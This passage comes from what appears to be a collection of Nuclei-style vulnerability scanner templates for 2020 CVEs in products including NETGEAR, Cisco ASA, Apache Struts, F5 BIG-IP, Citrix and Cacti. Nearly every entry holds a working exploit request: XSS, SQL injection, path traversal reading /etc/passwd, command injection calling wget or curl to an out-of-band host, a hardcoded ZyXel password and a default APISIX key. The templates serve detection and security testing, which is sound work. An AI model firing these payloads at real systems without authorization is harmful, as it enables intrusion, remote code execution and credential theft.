Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21012","info":{"name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /forgot_password.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbtn_forgot=1&email=1%27%20or%20sleep(6)%23\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Hotel Booking System\")"],"condition":"and"}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; 